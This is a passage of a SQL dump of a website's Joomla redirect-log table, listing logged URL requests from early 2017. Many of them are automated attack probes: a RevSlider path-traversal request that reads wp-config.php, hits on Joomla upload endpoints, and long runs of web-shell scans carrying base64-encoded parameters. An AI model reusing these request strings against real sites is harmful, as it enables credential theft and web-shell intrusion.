00:00:00'),(6146,'http://www.hallcrestheights.org/ixnm-ueahwhi-i20162634-ozhjx-bnwpge-k1012-yooayik-uksszqce-baqdomy.htm',NULL,'https://www.google.co.jp/','',7,0,'2017-01-29 23:21:08','0000-00-00 00:00:00'),(6147,'http://hallcrestheights.org/i20162628-fadlaj-fnlgfp/k25766-cvwgmy-hdec.htm',NULL,'','',3,0,'2017-01-30 10:56:02','0000-00-00 00:00:00'),(6148,'http://www.hallcrestheights.org/index.php?option=com_myblog&task=ajaxupload',NULL,'','',9,0,'2017-01-30 20:21:19','0000-00-00 00:00:00'),(6149,'http://www.hallcrestheights.org/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',8,0,'2017-01-30 20:21:21','0000-00-00 00:00:00'),(6150,'http://www.hallcrestheights.org/HH0208.pdf',NULL,'','',13,0,'2017-01-31 05:43:44','0000-00-00 00:00:00'),(6151,'http://www.hallcrestheights.org/i20162632-ajqxxu-cuzaofif-ephi-ijimj-k50089-njbo-gtsakbc-cgyfmdv/',NULL,'','',2,0,'2017-01-31 11:08:04','0000-00-00 00:00:00'),(6152,'http://hallcrestheights.org/gnfznx-vjxpal-titjsh-kyjy-i20162628-k46116-ldpija-amdurt-aenpg-gwtdvlx.htm',NULL,'','',1,0,'2017-01-31 12:25:23','0000-00-00 00:00:00'),(6153,'http://www.hallcrestheights.org/qlbowci-k46853-ggece-i20162630-ayafxr-glnikg/',NULL,'','',2,0,'2017-01-31 15:38:06','0000-00-00 00:00:00'),(6154,'http://www.hallcrestheights.org/i20162632-k25820-edzvdlqc-omnnm-mcawvbfu-japyvrl.htm',NULL,'https://www.google.co.jp/','',2,0,'2017-01-31 16:32:55','0000-00-00 00:00:00'),(6155,'http://www.hallcrestheights.org//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',2,0,'2017-02-01 04:36:08','0000-00-00 00:00:00'),(6156,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k5700-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-i20162635-cjkntsxj-lnuuuv.htm',NULL,'http://search.yahoo.co.jp/r/FOR=dcGnWmxV3ijuqw9RyaYEqk4It2Mw51P5P_RJNAgTGLkmHpXnCwqmgu_qPAbjNTfegh081waj8g2zxq5nT5M9yvkwvSpq.r4YRraNf3BxaOngusQTCmoQkE','',8,0,'2017-02-01 06:24:13','0000-00-00 00:00:00'),(6157,'http://hallcrestheights.org/i20162628-zmkued-tzjivy/k24866-oqxifg-xuhx.htm',NULL,'','',2,0,'2017-02-01 08:25:48','0000-00-00 00:00:00'),(6158,'http://hallcrestheights.org/i20162628-ixnmue-ahwhio-k25166-zhjxbn-wpge/yooayi-kukssz-qceba-qdomytn-iholbde-ntafym-luzextl-fggc.htm',NULL,'','',2,0,'2017-02-01 09:38:00','0000-00-00 00:00:00'),(6159,'http://hallcrestheights.org/index.php?option=com_user&task=register',NULL,'','',2,0,'2017-02-01 12:16:38','0000-00-00 00:00:00'),(6160,'http://hallcrestheights.org/i20162628-ryvhrh-mqtyys/k46166-llgeaj-anpd-mefnxh-qfhjdy.htm',NULL,'','',1,0,'2017-02-01 23:33:10','0000-00-00 00:00:00'),(6161,'http://hallcrestheights.org/i20162628-vqjnys-k46216-pvholj-peurrt-pilu-ourxiv-lbtrhn-nmtqz-kowtsxp-pbgrrcd.htm',NULL,'','',3,0,'2017-02-02 06:17:55','0000-00-00 00:00:00'),(6162,'http://hallcrestheights.org/k55124-upttm-i20162629-nbea-tgrb-nqcdcncx.htm',NULL,'','',4,0,'2017-02-02 08:56:03','0000-00-00 00:00:00'),(6163,'http://hallcrestheights.org/i20162628-k46016-dvisci-wbvwku-xkrbzo-msmv.htm',NULL,'','',3,0,'2017-02-02 08:56:04','0000-00-00 00:00:00'),(6164,'http://hallcrestheights.org/fadlaj-k45916-fnlgfp-cvwgmy-i20162628-hdec-wxbdeu.htm',NULL,'','',3,0,'2017-02-02 08:56:05','0000-00-00 00:00:00'),(6165,'http://hallcrestheights.org/k34424-fadla-i20162629-jfnl-gfpc-vwgmyhde.htm',NULL,'','',3,0,'2017-02-02 08:56:45','0000-00-00 00:00:00'),(6166,'http://hallcrestheights.org/edzvdl-k46516-qcomnn-mmcawv-i20162628-bfuj-apyvrl-flxhqj-kuhkc.htm',NULL,'','',5,0,'2017-02-02 11:38:23','0000-00-00 00:00:00'),(6167,'http://www.hallcrestheights.org/create-an-account.html',NULL,'http://www.hallcrestheights.org/create-an-account.html','',87,0,'2017-02-02 12:24:55','0000-00-00 00:00:00'),(6168,'http://www.hallcrestheights.org/i20162634-uptt-mnbeatg-k212-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'https://search.yahoo.co.jp/','',3,0,'2017-02-02 21:31:51','0000-00-00 00:00:00'),(6169,'http://hallcrestheights.org/pcscqr-ufunpk-wxpoid-eotw/tvsoar-mosmge-k25566-plalh-eliyrqi-i20162628-yqfufxv-ugowop.htm',NULL,'','',1,0,'2017-02-02 21:33:29','0000-00-00 00:00:00'),(6170,'http://hallcrestheights.org//functions.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:15','0000-00-00 00:00:00'),(6171,'http://hallcrestheights.org//cache/news.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:16','0000-00-00 00:00:00'),(6172,'http://hallcrestheights.org//tmp.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-02-02 23:16:17','0000-00-00 00:00:00'),(6173,'http://hallcrestheights.org//shootme.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:18','0000-00-00 00:00:00'),(6174,'http://hallcrestheights.org//configurationbak.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:19','0000-00-00 00:00:00'),(6175,'http://hallcrestheights.org//robots.txt.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:20','0000-00-00 00:00:00'),(6176,'http://hallcrestheights.org//jconfig.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:22','0000-00-00 00:00:00'),(6177,'http://hallcrestheights.org//media/reads.php?z3=U0xOY1JFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:24','0000-00-00 00:00:00'),(6178,'http://hallcrestheights.org//media/1ndex.php?z3=U0xOY1JFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:25','0000-00-00 00:00:00'),(6179,'http://hallcrestheights.org//sql_dump.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:26','0000-00-00 00:00:00'),(6180,'http://hallcrestheights.org//images/laj.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:27','0000-00-00 00:00:00'),(6181,'http://hallcrestheights.org//media/404.php?z3=U0xOY1JFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:29','0000-00-00 00:00:00'),(6182,'http://hallcrestheights.org//media/tmp.php?z3=U0xOY1JFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:30','0000-00-00 00:00:00'),(6183,'http://hallcrestheights.org//r3x.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:31','0000-00-00 00:00:00'),(6184,'http://hallcrestheights.org//log.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:32','0000-00-00 00:00:00'),(6185,'http://hallcrestheights.org//images/stories/0day.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:34','0000-00-00 00:00:00'),(6186,'http://hallcrestheights.org//includes/u2p.php?z3=U0xOY1JFLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:34','0000-00-00 00:00:00'),(6187,'http://hallcrestheights.org//images/xxx.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:35','0000-00-00 00:00:00'),(6188,'http://hallcrestheights.org//al277.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:36','0000-00-00 00:00:00'),(6189,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:37','0000-00-00 00:00:00'),(6190,'http://hallcrestheights.org//install.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:39','0000-00-00 00:00:00'),(6191,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=U0xOY1JFLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:40','0000-00-00 00:00:00'),(6192,'http://hallcrestheights.org//robot.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:41','0000-00-00 00:00:00'),(6193,'http://hallcrestheights.org//wsdl.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:42','0000-00-00 00:00:00'),(6194,'http://hallcrestheights.org//goog1es.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:43','0000-00-00 00:00:00'),(6195,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=U0xOY1JFLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:44','0000-00-00 00:00:00'),(6196,'http://hallcrestheights.org//update.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:46','0000-00-00 00:00:00'),(6197,'http://hallcrestheights.org//includes.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:47','0000-00-00 00:00:00'),(6198,'http://hallcrestheights.org//wp-main.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:48','0000-00-00 00:00:00'),(6199,'http://hallcrestheights.org//news.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:49','0000-00-00 00:00:00'),(6200,'http://hallcrestheights.org//images/al277.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:50','0000-00-00 00:00:00'),(6201,'http://hallcrestheights.org//webconfig.txt.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:51','0000-00-00 00:00:00'),(6202,'http://hallcrestheights.org//cache/cachee.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:52','0000-00-00 00:00:00'),(6203,'http://hallcrestheights.org//thumb.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:53','0000-00-00 00:00:00'),(6204,'http://hallcrestheights.org//SessionController.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:54','0000-00-00 00:00:00'),(6205,'http://hallcrestheights.org//maill.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:56','0000-00-00 00:00:00'),(6206,'http://hallcrestheights.org//error-log.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:57','0000-00-00 00:00:00'),(6207,'http://hallcrestheights.org//authenticating.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:58','0000-00-00 00:00:00'),(6208,'http://hallcrestheights.org//google-assist.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:16:59','0000-00-00 00:00:00'),(6209,'http://hallcrestheights.org//images/google-assist.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:00','0000-00-00 00:00:00'),(6210,'http://hallcrestheights.org//images/robots.txt.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:01','0000-00-00 00:00:00'),(6211,'http://hallcrestheights.org//elements.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:02','0000-00-00 00:00:00'),(6212,'http://hallcrestheights.org//xmlsrpc.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:03','0000-00-00 00:00:00'),(6213,'http://hallcrestheights.org//wp-cache.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:05','0000-00-00 00:00:00'),(6214,'http://hallcrestheights.org//images/404.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:06','0000-00-00 00:00:00'),(6215,'http://hallcrestheights.org//images/head.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:07','0000-00-00 00:00:00'),(6216,'http://hallcrestheights.org//cache/support.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:08','0000-00-00 00:00:00'),(6217,'http://hallcrestheights.org//RoseLeif.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:09','0000-00-00 00:00:00'),(6218,'http://hallcrestheights.org//Abbrevsprl.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:10','0000-00-00 00:00:00'),(6219,'http://hallcrestheights.org//show.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:11','0000-00-00 00:00:00'),(6220,'http://hallcrestheights.org//images/defau1t.php?z3=U0xOY1JFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:12','0000-00-00 00:00:00'),(6221,'http://hallcrestheights.org//cli/40dd1d.php?z3=U0xOY1JFLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:13','0000-00-00 00:00:00'),(6222,'http://hallcrestheights.org//infos.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:14','0000-00-00 00:00:00'),(6223,'http://hallcrestheights.org//cache/defau1t.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:15','0000-00-00 00:00:00'),(6224,'http://hallcrestheights.org//bookmark.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:16','0000-00-00 00:00:00'),(6225,'http://hallcrestheights.org//configbak.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:17','0000-00-00 00:00:00'),(6226,'http://hallcrestheights.org//wp-data.php?z3=U0xOY1JFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:18','0000-00-00 00:00:00'),(6227,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:19','0000-00-00 00:00:00'),(6228,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:20','0000-00-00 00:00:00'),(6229,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:21','0000-00-00 00:00:00'),(6230,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:22','0000-00-00 00:00:00'),(6231,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:23','0000-00-00 00:00:00'); INSERT INTO `jos_redirect_links` VALUES (6232,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:24','0000-00-00 00:00:00'),(6233,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:25','0000-00-00 00:00:00'),(6234,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:26','0000-00-00 00:00:00'),(6235,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:27','0000-00-00 00:00:00'),(6236,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=U0xOY1JFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:28','0000-00-00 00:00:00'),(6237,'http://hallcrestheights.org//cache/list.php?z3=U0xOY1JFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-02 23:17:29','0000-00-00 00:00:00'),(6238,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/SLNcRE.php',NULL,'','',1,0,'2017-02-02 23:17:56','0000-00-00 00:00:00'),(6239,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/SLNcRE.php',NULL,'','',1,0,'2017-02-02 23:17:57','0000-00-00 00:00:00'),(6240,'http://hallcrestheights.org//wp-content/uploads/SLNcRE.php',NULL,'','',1,0,'2017-02-02 23:17:58','0000-00-00 00:00:00'),(6241,'http://hallcrestheights.org//SLNcRE.php',NULL,'','',1,0,'2017-02-02 23:17:59','0000-00-00 00:00:00'),(6242,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/SLNcRE.php',NULL,'','',1,0,'2017-02-02 23:18:00','0000-00-00 00:00:00'),(6243,'http://hallcrestheights.org/k25816-ixnmue-ahwhio-zhjxbn-i20162628-wpge-yooayi-kukssz-qceba.htm',NULL,'','',3,0,'2017-02-03 08:38:10','0000-00-00 00:00:00'),(6244,'http://hallcrestheights.org//sqlbak.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:14:50','0000-00-00 00:00:00'),(6245,'http://hallcrestheights.org//sql-bak.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:14:56','0000-00-00 00:00:00'),(6246,'http://hallcrestheights.org//email.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:15:16','0000-00-00 00:00:00'),(6247,'http://hallcrestheights.org//functions.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:17:35','0000-00-00 00:00:00'),(6248,'http://hallcrestheights.org//cache/news.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:19:46','0000-00-00 00:00:00'),(6249,'http://hallcrestheights.org//tmp.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-02-03 13:21:29','0000-00-00 00:00:00'),(6250,'http://hallcrestheights.org//shootme.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',5,0,'2017-02-03 13:21:51','0000-00-00 00:00:00'),(6251,'http://hallcrestheights.org//robots.txt.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:28:20','0000-00-00 00:00:00'),(6252,'http://hallcrestheights.org//jconfig.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:30:21','0000-00-00 00:00:00'),(6253,'http://hallcrestheights.org//media/reads.php?z3=MFNENmRLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:33:40','0000-00-00 00:00:00'),(6254,'http://hallcrestheights.org//media/1ndex.php?z3=MFNENmRLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:35:21','0000-00-00 00:00:00'),(6255,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=MFNENmRLLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:37:24','0000-00-00 00:00:00'),(6256,'http://hallcrestheights.org//sql_dump.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:37:30','0000-00-00 00:00:00'),(6257,'http://hallcrestheights.org//media/tmp.php?z3=MFNENmRLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:41:29','0000-00-00 00:00:00'),(6258,'http://hallcrestheights.org//r3x.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:41:46','0000-00-00 00:00:00'),(6259,'http://hallcrestheights.org//log.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:43:46','0000-00-00 00:00:00'),(6260,'http://hallcrestheights.org//images/stories/0day.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:43:51','0000-00-00 00:00:00'),(6261,'http://hallcrestheights.org//includes/u2p.php?z3=MFNENmRLLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:45:16','0000-00-00 00:00:00'),(6262,'http://hallcrestheights.org//images/xxx.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:45:24','0000-00-00 00:00:00'),(6263,'http://hallcrestheights.org//al277.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:47:56','0000-00-00 00:00:00'),(6264,'http://hallcrestheights.org/lugdlt-rsmxxh-ypzqjl-lzoh-njumnt-ecwfog-k46716-ywbiw-yrurfgv-i20162628-fcwqzhr-ibnkny.htm',NULL,'','',5,0,'2017-02-03 13:48:20','0000-00-00 00:00:00'),(6265,'http://hallcrestheights.org//roubt.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:49:00','0000-00-00 00:00:00'),(6266,'http://hallcrestheights.org//includes.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:49:06','0000-00-00 00:00:00'),(6267,'http://hallcrestheights.org//images/al277.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-02-03 13:49:17','0000-00-00 00:00:00'),(6268,'http://hallcrestheights.org//webconfig.txt.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:51:07','0000-00-00 00:00:00'),(6269,'http://hallcrestheights.org//cache/cachee.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:51:30','0000-00-00 00:00:00'),(6270,'http://hallcrestheights.org//thumb.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:51:40','0000-00-00 00:00:00'),(6271,'http://hallcrestheights.org//configbak.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:05','0000-00-00 00:00:00'),(6272,'http://hallcrestheights.org//wp-main.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:13','0000-00-00 00:00:00'),(6273,'http://hallcrestheights.org//robot.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:22','0000-00-00 00:00:00'),(6274,'http://hallcrestheights.org//install.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:29','0000-00-00 00:00:00'),(6275,'http://hallcrestheights.org//images/1ndex.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:38','0000-00-00 00:00:00'),(6276,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=MFNENmRLLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:48','0000-00-00 00:00:00'),(6277,'http://hallcrestheights.org//resd.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:52:57','0000-00-00 00:00:00'),(6278,'http://hallcrestheights.org//M-F4r3s.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:05','0000-00-00 00:00:00'),(6279,'http://hallcrestheights.org//images/laj.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:15','0000-00-00 00:00:00'),(6280,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:25','0000-00-00 00:00:00'),(6281,'http://hallcrestheights.org//wsdl.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:35','0000-00-00 00:00:00'),(6282,'http://hallcrestheights.org//goog1es.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:46','0000-00-00 00:00:00'),(6283,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=MFNENmRLLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:53:57','0000-00-00 00:00:00'),(6284,'http://hallcrestheights.org//update.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:09','0000-00-00 00:00:00'),(6285,'http://hallcrestheights.org//news.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:19','0000-00-00 00:00:00'),(6286,'http://hallcrestheights.org//SessionController.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:27','0000-00-00 00:00:00'),(6287,'http://hallcrestheights.org//maill.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:33','0000-00-00 00:00:00'),(6288,'http://hallcrestheights.org//error-log.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:49','0000-00-00 00:00:00'),(6289,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:54:57','0000-00-00 